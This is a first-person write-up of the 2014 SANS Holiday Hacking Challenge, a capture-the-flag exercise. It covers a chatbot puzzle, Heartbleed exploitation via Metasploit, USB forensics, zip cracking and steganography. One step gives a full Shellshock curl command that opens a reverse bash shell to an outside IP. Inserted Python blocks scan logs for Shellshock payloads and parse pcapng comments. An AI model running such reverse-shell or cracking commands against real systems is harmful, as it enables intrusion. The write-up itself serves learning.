2014 SANS Holiday Hacking Challenge

So,

Right before the holiday, I got wind of the SANS Institute Christmas hacking competition. This was no small feat, but through collaboration with folks from @MIsec, @SecureKomodo (check him out at http://securekomodo.com), and others, we were able to hack till our hearts' content. Below you will find my officially submitted write-up for reference…very fun stuff!

The Initial Investigation

When this mission was presented to me, I assumed it was in jest after learning of the prize at stake. Any guardian of information technology will tell you that the chance to learn with the SANS Institute is an amazing opportunity indeed!

The setup was simple…Ebenezer Scrooge had become arrogant in his old age and had decided that hacking for humanity was a lost cause. As the story goes, this old codger was visited by three mysterious apparitions after first being visited by the spirit of his fallen comrade, Marley. All of these terrors served one purpose: to steer Scrooge from his evil ways and back to the path of righteousness. Like the three wise men of other tales of yore, each of these spirits bore a gift, although the joyous nature of those gifts was not immediately apparent when received.

The Ghost of Christmas Past

[Image: ghost1]

Mission Brief

The Ghost of Christmas Past was none other than Dr. Alan Turing himself. This father of information science visited Mr. Scrooge first, to offer a fond memory of happier times gone by. He showed Scrooge how he was once an advocate of hacking for good, reminding him that his outlook was not always as bleak as it is now. In parting, Dr. Turing left an invitation for Ebenezer to meet with one of his own acquaintances, who would provide Scrooge with both companionship and sensitive information. The mission is to investigate the information that Dr. Turing provided and recover said intelligence.

Gathered Intelligence

Full Domain Name: li243-59.members.linode.com
Operating System: Linux (Unknown Kernel)
IPv4 Address: 173.255.233.59
Services/Ports:

Port    Service               Status     Notes
22      SSH (Secure Shell)    Open       OpenSSH 6.0p1 Debian 4+deb7u2
25      SMTP                  Filtered
113     Ident                 Filtered
135     MSRPC                 Filtered
139     NetBIOS-SSN           Filtered
445     MS-DS                 Filtered
31124   Unknown               Open

Tools Used
  • Putty (SSH/Telnet Client)
  • TeraTerm (SSH/Telnet Client)
  • nMap (Port Scanner)
  • Wireshark (Packet Analyzer)
  • Apache Web Server

Summary of Findings

When I began my investigation of this mysterious “friend”, I will admit that I was baited by the apparent SSH utilization. It wasn’t until I had exhausted my efforts searching for a private key that I realized port 31124 had been open right under my nose.

It was then that I first found Eliza, an artificial intelligence which had undergone Dr. Turing’s “Turing Test” and actually passed, successfully exhibiting natural speaking patterns and cognizant behavior resembling human thought. Connecting through a Telnet session, I was immediately greeted by the A.I., which introduced itself by name. I asked about the “secret” straight away, and my inquiry was met with humor as she explained that “A girl has to have her secrets.” Remembering Dr. Turing’s advice to Scrooge, I asked about surfing the web together, and Eliza again responded with a joke. This carried on for a while as I attempted to feel out the language barriers and acceptable syntax. The conversation eventually went as follows…

Eliza: “I AM ELIZA. WHAT’S ON YOUR MIND?”
Me: “Hello, how are you?”
Eliza: “How do you do. Please state your problem”
Me: “I am looking for your secret”
Eliza: “A girl’s gotta keep her secrets. Why don’t you ask me about something else?”
Me: “I really need your secret”
Eliza: “You really are interested in my secret. I think we should get to know each other better first. Tell me about your favorite websites.”
Me: “Listen, I just need to know your secret.”
Eliza: “I am so sorry, but I can’t tell you my secret via this dialog. I do really like you, but I worry that someone may be shoulder surfing you. No one is shoulder surfing me, though, so why don’t you give me a URL that I can surf to?”
Me: “Browse http://www.google.com”
Eliza: “Does this look like the correct page? GOOGLE”

At this point, I was stumped. Throughout this conversation I had been using Wireshark to capture the traffic and had not found anything profound. I then told the A.I. to navigate to one of my own websites (http://www.netlocksystems.com). After it returned the same sort of response to my new query, I logged into my own web server and started looking through my connection and authentication logs to see if Eliza had left any sort of footprint. To my surprise, I found the following entry in my connection log.

Secret Revealed

173.255.233.59 [29/Dec/2014:00:10:09 -0500] "GET / HTTP/1.1" 200 10837 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: \"Machines take me by surprise with great frequency. -Alan Turing\""

The Ghost of Christmas Present

[Image: ghost2]

Mission Brief

The second spirit to visit Scrooge was none other than Johnny Long, famed Google hacker and philanthropist. After a lengthy vision of Tiny Tom and Mrs. Cratchit discussing his charitable contributions to the Shelter for Impossibly Cute Orphaned Puppies, the spirit reveals to Scrooge that hacking can be used for good. Mr. Long also reveals that he has embedded two “special secrets” within Scrooge’s very own website, Scrooge-and-Marley.com.


Gathered Intelligence

URL: http(s)://www.scrooge-and-marley.com

IP Address: 23.239.15.124

Operating System: Linux (Unknown Distribution)

Site Contents: index.html, contact.html, cgi-bin/submit.sh, various images


There is a key statement made by the spirit which quickly led me to an appropriate path of research. Shortly before leaving Mr. Scrooge, the ghost states “Those secrets should shock your heart, teaching you important lessons for all time.” The keywords here are of course “Shock” and “Heart”, pointing to Shellshock, the widespread Bash vulnerability, and Heartbleed, the OpenSSL vulnerability, both of which had been in the news recently.

My first order of business was to research these vulnerabilities and dig deeper into the parameters surrounding them. Digging deeper into Shellshock, I was able to better understand how the User-Agent header, which a CGI web server passes to Bash as an environment variable, can be changed to include an executable line of code.
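Both the Eliza secret (which surfaced in a web server's access log, complete with escaped quotes) and the Shellshock technique just described ride in on HTTP headers, so the defender's view of both is the access log. The Python below is an added example, not code from the original write-up: it parses Apache combined-format lines, handling the \" escapes seen in the Eliza entry, and flags any logged client-controlled field carrying the "() {" function-definition prefix. The Eliza line is the one from the page with the combined format's "- -" ident/user fields restored; the 203.0.113.7 and 198.51.100.4 lines are constructed.

```python
import re

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i".
# httpd writes an embedded double quote as \" and a backslash as \\ (exactly what the
# Eliza entry shows), so a naive split on '"' would truncate that User-Agent.
_QUOTED = r'"((?:[^"\\]|\\.)*)"'  # escape-aware quoted field
COMBINED_RE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^\]]+)\] ' + _QUOTED + r' (\d{3}) (\S+) '
    + _QUOTED + ' ' + _QUOTED + '$'
)
# The "() {" prefix that vulnerable Bash versions parsed as a function definition
# when it appeared at the start of an environment variable's value.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def _unescape(field: str) -> str:
    """Undo httpd's backslash escaping of quotes and backslashes in a quoted field."""
    return re.sub(r'\\(["\\])', r'\1', field)


def parse_combined(line: str):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    if m is None:
        return None
    ip, _ident, _user, ts, req, status, size, ref, ua = m.groups()
    return {
        "ip": ip, "time": ts, "request": _unescape(req), "status": int(status),
        "bytes": 0 if size == "-" else int(size),
        "referer": _unescape(ref), "user_agent": _unescape(ua),
    }


def shellshock_suspect(entry: dict) -> bool:
    """True if a logged client-controlled field carries the function-definition prefix.
    Caveat: the combined format only records Referer and User-Agent, so a payload sent in
    any other header (like the custom 'x:' header in this write-up) is invisible here and
    needs a log format that captures all headers, or inspection at a proxy, WAF or IDS."""
    return any(SHELLSHOCK_RE.search(entry[k]) for k in ("request", "referer", "user_agent"))


def scan_log(text: str):
    """Parse every non-empty line and tag each parsed entry with a 'shellshock' flag."""
    entries = []
    for line in text.splitlines():
        entry = parse_combined(line) if line.strip() else None
        if entry is not None:
            entry["shellshock"] = shellshock_suspect(entry)
            entries.append(entry)
    return entries


# Constructed sample: line 1 is the write-up's Eliza entry (with the "- -" ident/user
# fields of the combined format restored); lines 2 and 3 are made up for this example.
SAMPLE_LOG = r'''173.255.233.59 - - [29/Dec/2014:00:10:09 -0500] "GET / HTTP/1.1" 200 10837 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: \"Machines take me by surprise with great frequency. -Alan Turing\""
203.0.113.7 - - [29/Dec/2014:00:12:44 -0500] "GET /cgi-bin/submit.sh HTTP/1.1" 200 - "-" "() { :;}; echo vulnerable"
198.51.100.4 - - [29/Dec/2014:00:13:01 -0500] "GET /contact.html HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"
'''
```

Running scan_log(SAMPLE_LOG) recovers the full Eliza User-Agent with its inner quotes intact and flags only the second line.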


Tools Used

  • NetCat
  • Curl


Summary of Findings


Heartbleed (Secret #1)

  1. First, I verified that this website/web server was susceptible to the Heartbleed vulnerability, using the Qualys SSL Labs test. Qualys quickly reported that the site was vulnerable to Heartbleed, POODLE, and the OpenSSL CCS vulnerability (CVE-2014-0224), among other things.
  2. Once the vulnerability was established, I began to research exploit techniques for Heartbleed and found Metasploit to be the most effective method.
  3. Using the Heartbleed module (auxiliary/scanner/ssl/openssl_heartbleed), I was able to run the module successfully and save a .bin file containing the memory leaked from the web server. Exploring the hex data of the .bin file with FileAlyzer, I was able to obtain the following plain-text message as well as the first website secret.

“For in the very air through which this Spirit moved it seemed to scatter gloom and mystery.

It was shrouded in a deep black garment which concealed its head its face its form and left nothing of it visible save one outstretched hand.

But for this it would have been difficult to detach its figure from the night and separate it from the darkness by which it was surrounded.”

Website Secret #1: Hacking can be noble

Shellshock (Secret #2)

This was a little different. Part of my preliminary investigation of the website included a full site download using Black Widow© from Softbyte Labs. This download revealed an Index page, a Contact page and a corresponding .sh script within the cgi-bin folder. This script would normally be used to carry out the form functions of the contact page. As all of the appropriate parameters seemed to be in place, I began working with this exploit.


  1. For this exploit, I used a reverse Unix shell, which required me to first segregate my Kali VM into a DMZ and then enable port forwarding. For verification, I started the Apache service within Kali and confirmed that my landing page was reachable by IP.
  2. Next, I started a NetCat listener with the command: ncat -l -v 4444
  3. Opening a second terminal, I then executed the following command to call a reverse shell back to my public IP address: curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/MYPUBLICIPADDRESS/4444 0>&1' http://23.239.15.124/cgi-bin/submit.sh
  4. Almost immediately, my ncat window responded and I was able to push commands to the remote server. I was not out of the woods yet, however. Although the prompt said “bash-4.2”, nearly all of my familiar bash commands were gone. Using $SHELL, I could see that my shell was /bin/sh and not /bin/bash. I then began to research Unix built-in shell commands and came to the realization that this was a sort of Korn/POSIX mix. I was able to use printf "%s\n" * in place of ls so I could begin to map the file structure, although I was not entirely sure what I was looking for. By some stroke of luck, I decided to start at the very beginning (the root directory) and work my way forward.
  5. Target found! Using the following commands, I was able to locate the secret, but I was not yet sure how to read it. With no copy, cat, or rename options, I was afraid this case had bested me. A little more research and practice within the command line and I was able to pass the contents of the “secret” file to echo and print it back to stdout.

cd /
printf "%s\n" *      # one entry per line, standing in for the missing ls
echo "$(<secret)"    # $(<file) reads the file without cat (a ksh/bash extension)

The finished product can be seen below; the secret was revealed to me just like the others before it.

[Image: website2]

Secrets Revealed

While other vulnerabilities were present in the website, the Spirit had only indicated that two secrets had been hidden. These secrets have since been recovered and archived.

Website Secret #1: Hacking can be noble

Website Secret #2: Use your skills for good.

The Ghost of Christmas Future

[Image: ghost3]

Mission Brief

In Scrooge’s third and final revelation, he is given data on an external USB drive which shows him evidence of things to come, and which obviously startled him. Without uttering a word, this Spirit rocked Scrooge to his very core with the dark and mysterious secrets entwined in this small disk partition.

Gathered Intelligence

While this final task was not the most technically demanding, it may have required the most brain power. Within this flash drive, four different secrets were hidden among its contents. When I first dredged through the contents of this drive, the first thing that caught my attention was a password-protected zip file. In retrospect, the work that I put into cracking the zip file was in vain, as I later discovered the password elsewhere in plaintext, but that is a story for a different time.

Tools Used

  • FileAlyzer
  • 7Zip
  • WireShark
  • F5 Steganography
  • Fcrackzip
  • EXIF Data Extractor
  • Misc…

The initial contents of the .bin file included the following…

hhusb.bin
|- $Extend
   |- $RmMetadata
      |- $Txf
      |- $TxfLog
         |- $Tops
         |- $Tops:$T
      |- $Repair
      |- $Repair:$Config
|- [DELETED]
   |- Tiny_Tom_Crutches_Final.jpg
|- [SYSTEM]
   |- $Extend
   |- .
   |- $MFT
   |- $MFTMirr
   |- $LogFile
   |- $Volume
   |- $AttrDef
   |- $Bitmap
   |- $Boot
   |- $BadClus
   |- $Secure:$SDS
   |- $UpCase
|- hh2014-chat.pcapng
|- hh2014-chat.pcapng:Bed_Curtains.zip
   |- Bed_Curtains.png
|- LetterFromJackToChuck.doc


Summary of Findings

While these secrets were not discovered in order, they will be presented that way for the purpose of consistency. This first secret was discovered rather quickly. In the “LetterFromJackToChuck.doc” file, we are presented with a standard Microsoft Word document with two separate embedded graphics. This is a letter from Jonathan Pease to Charles Booth and serves two purposes. Jonathan is writing, not only to wish Charles a happy Holiday filled with love and merriment but also to reveal the fact that Scrooge has died. The undertone is one of relief and celebration at the fact that Ebenezer is dead. First, the graphics were extracted from this document for a quick steganography/hidden data check which revealed nothing unusual. The letter itself was a different story. While viewing the hex data of the document file using the FileAlyzer tool, I was able to see a plain text message which is shown below…

[Image: snap1]

[Image: snap2]

In the image above, the secret is revealed as:

USB Secret #1: Your demise is a source of mirth

The second secret was actually discovered while examining the packet capture file. While reconstructing the conversation shown below, I also discovered two packets that contained comment information. The comment relevant to this secret was a Base64 string. After decoding this string with PowerShell, I discovered the second secret.

$data='VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg=='

[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($data))

USB Secret #2: Your demise is a source of relief.
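Packet comments like this one are stored as opt_comment options on the pcapng Enhanced Packet Block, so they can be pulled out programmatically rather than spotted by eye in Wireshark. The Python below is an added example, not from the original write-up: it builds a small constructed capture (SHB, one IDB, three EPBs) that carries the page's Base64 string as a comment on the second packet, walks the block and option structure to collect comments, and decodes whichever ones are valid Base64. Real pcapng files written big-endian are an assumption this reader does not handle.

```python
import base64
import struct

# pcapng block types and option codes; this minimal reader assumes a little-endian
# section (byte-order magic 0x1A2B3C4D in the SHB), which is what Wireshark writes.
SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006
OPT_END, OPT_COMMENT = 0, 1

def _pad4(b: bytes) -> bytes:
    return b + b"\0" * (-len(b) % 4)

def _block(btype: int, body: bytes) -> bytes:
    total = 12 + len(body)  # type + length + body + trailing length
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)

def _option(code: int, value: bytes) -> bytes:
    return struct.pack("<HH", code, len(value)) + _pad4(value)

def build_sample_pcapng(packets) -> bytes:
    """Constructed capture: an SHB, one Ethernet IDB, then one EPB per (payload, comment)."""
    out = _block(SHB, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1) + _option(OPT_END, b""))
    out += _block(IDB, struct.pack("<HHI", 1, 0, 65535) + _option(OPT_END, b""))
    for i, (payload, comment) in enumerate(packets):
        opts = _option(OPT_COMMENT, comment.encode()) if comment else b""
        fixed = struct.pack("<IIIII", 0, 0, i, len(payload), len(payload))  # iface, ts, caplen, origlen
        out += _block(EPB, fixed + _pad4(payload) + opts + _option(OPT_END, b""))
    return out

def packet_comments(data: bytes):
    """Walk the block chain; return (packet_number, comment) for every EPB with an opt_comment."""
    found, off, n = [], 0, 0
    while off + 12 <= len(data):
        btype, blen = struct.unpack_from("<II", data, off)
        if blen < 12 or off + blen > len(data):
            raise ValueError(f"bad block length at offset {off}")
        if btype == EPB:
            n += 1
            caplen = struct.unpack_from("<I", data, off + 20)[0]
            pos = off + 28 + (caplen + 3) // 4 * 4   # past the 20 fixed bytes and padded packet data
            end = off + blen - 4                     # options end before the trailing block length
            while pos + 4 <= end:
                code, olen = struct.unpack_from("<HH", data, pos)
                if code == OPT_END:
                    break
                if code == OPT_COMMENT:
                    found.append((n, data[pos + 4:pos + 4 + olen].decode("utf-8", "replace")))
                pos += 4 + (olen + 3) // 4 * 4
        off += blen
    return found

def decoded_comments(data: bytes):
    """Base64-decode each comment that decodes cleanly to UTF-8 text; keep the rest verbatim."""
    out = []
    for n, text in packet_comments(data):
        try:
            out.append((n, base64.b64decode(text, validate=True).decode("utf-8")))
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            out.append((n, text))
    return out

# Constructed sample; the Base64 string is the one quoted in the write-up.
SECRET_B64 = "VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg=="
SAMPLE_PCAPNG = build_sample_pcapng([(b"\0" * 60, None), (b"\0" * 64, SECRET_B64),
                                     (b"\0" * 48, "left in the clear (constructed)")])
```

Pointing packet_comments at the bytes of a real capture (open(path, "rb").read()) lists every commented packet without opening Wireshark.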

The third secret was a little different in that there were multiple tasks to accomplish. During my initial forensic analysis, I discovered a password-protected zip file. After finding the wealth of information in the hex/metadata of the other images found here, I was sure that this archive held untold secrets as well. Using fcrackzip, an archive-cracking utility found within Kali Linux, I was able to crack the file and extract the information contained within.

Fcrackzip

  1. First, I located and prepared the RockYou word list found in /usr/share/WordLists.
  2. In a terminal window, execute

fcrackzip -v -D -u -p rockyou.txt hh2014-chat.pcapng

  3. The password was revealed in less than 30 seconds, as shown in the following illustration.
  4. Once the zip file was opened and the contents extracted, I found a .png image depicting the divvying up of Scrooge’s possessions after his death.

[Image: fcrack - Bruteforce cracking of the archive file]

  5. Once again, FileAlyzer allowed a quick view of the hex data from this Bed_Curtains image, which revealed secret 3…

USB Secret #3: Your demise is a source of gain for others

For the fourth and final secret, I must admit that I had gone in circles here, and for good reason. Prior to discovering the commented packets contained within the capture file, a quick inspection of the Tiny Tom crutches photo revealed both strange-looking pixels within the image, especially over the text on the stow tags, and an odd copyright string within the hex, which read “JPEG Encoder Copyright 1998, James R. Weeks and BioElectroMech”.

[Image: crutches]

Some Googling reveals that this tool is very old and discontinued, and surprisingly little information is available about its use. Several Exif and steganography tools later, I thought that this final secret was going to be a pivotal moment and either make or break my case. While gathering data for the other secrets, I decided to take one final look at the capture file and the conversation contained within, to be sure I hadn’t missed some crucial piece of evidence. For clarity, I’m including the conversation here in my research…


2a368e544111c18030856a46320200e68ad8a263: @Caroline Smith username: csmith
d5c1bc63db3b1c59cc312503433470270e146e24: @Samuel Smith username: ssmith
2a368e544111c18030856a46320200e68ad8a263: “My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able scrape together enough to meet his minimum payment and stay out of debtor’s prison. Please tell me of your progress, my love.”
d5c1bc63db3b1c59cc312503433470270e146e24: “As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear.”
2a368e544111c18030856a46320200e68ad8a263: “Is it good… or bad?”
d5c1bc63db3b1c59cc312503433470270e146e24: “Bad”
2a368e544111c18030856a46320200e68ad8a263: “We are quite ruined”
d5c1bc63db3b1c59cc312503433470270e146e24: “No. There is hope yet, Caroline”
2a368e544111c18030856a46320200e68ad8a263: “If he relents, there is. Nothing is past hope, if such a miracle has happened.”
d5c1bc63db3b1c59cc312503433470270e146e24: “He is past relenting. He is dead.”
2a368e544111c18030856a46320200e68ad8a263: “That is wondrous news! To whom will our debt be transferred?”
d5c1bc63db3b1c59cc312503433470270e146e24: “I don’t know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!”
2a368e544111c18030856a46320200e68ad8a263: “I’ve just told our children about Mr. Scrooge’s death, and all of their faces are brighter for it. We now have a very happy house. I so love you.”
d5c1bc63db3b1c59cc312503433470270e146e24: “I shall see you soon, my dear. Lovingly — Samuel.”

This conversation was all presented in clear text within several TCP packets, disclosing that Scrooge was dead. A relieved husband and wife, Samuel and Caroline Smith, express their thankfulness at the tyrant’s end. After going through this once again, I realized that I had simply been following the TCP stream to retrieve this conversation but hadn’t paid much attention to the individual packets within the exchange. A closer inspection revealed two comments, one of which had been mentioned in previous research. The second comment, which is extremely important here, refers to a Google Code repository where a tool called F5 steganography has been developed.

[Image: wshark1]

As I’m sure the suspense is killing you as the reader, it goes without saying that I had stumbled upon the Holy Grail. After researching this tool and its capabilities, it became shockingly apparent that this was my key to salvation. Using the command shown below, I was able to recover the final secret.

[Image: stego1 - Extracting embedded text from the JPG image using the F5 algorithm]

Decoded Text:

“Tiny Tom has died.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.”

Secrets Revealed

A brief recap of the information found on the USB drive given to Scrooge by the Ghost of Christmas Future reveals a time in which Scrooge is no more, and instead of tears of sympathy, every tear is brimming with joy at the news of his passing.

USB Secret #1: Your demise is a source of mirth.

USB Secret #2: Your demise is a source of relief.

USB Secret #3: Your demise is a source of gain for others.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.


Secrets Index

Eliza Secret: “Machines take me by surprise with great frequency. -Alan Turing”

Website Secret #1: Hacking can be noble.

Website Secret #2: Use your skills for good.

USB Secret #1: Your demise is a source of mirth.

USB Secret #2: Your demise is a source of relief.

USB Secret #3: Your demise is a source of gain for others.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.
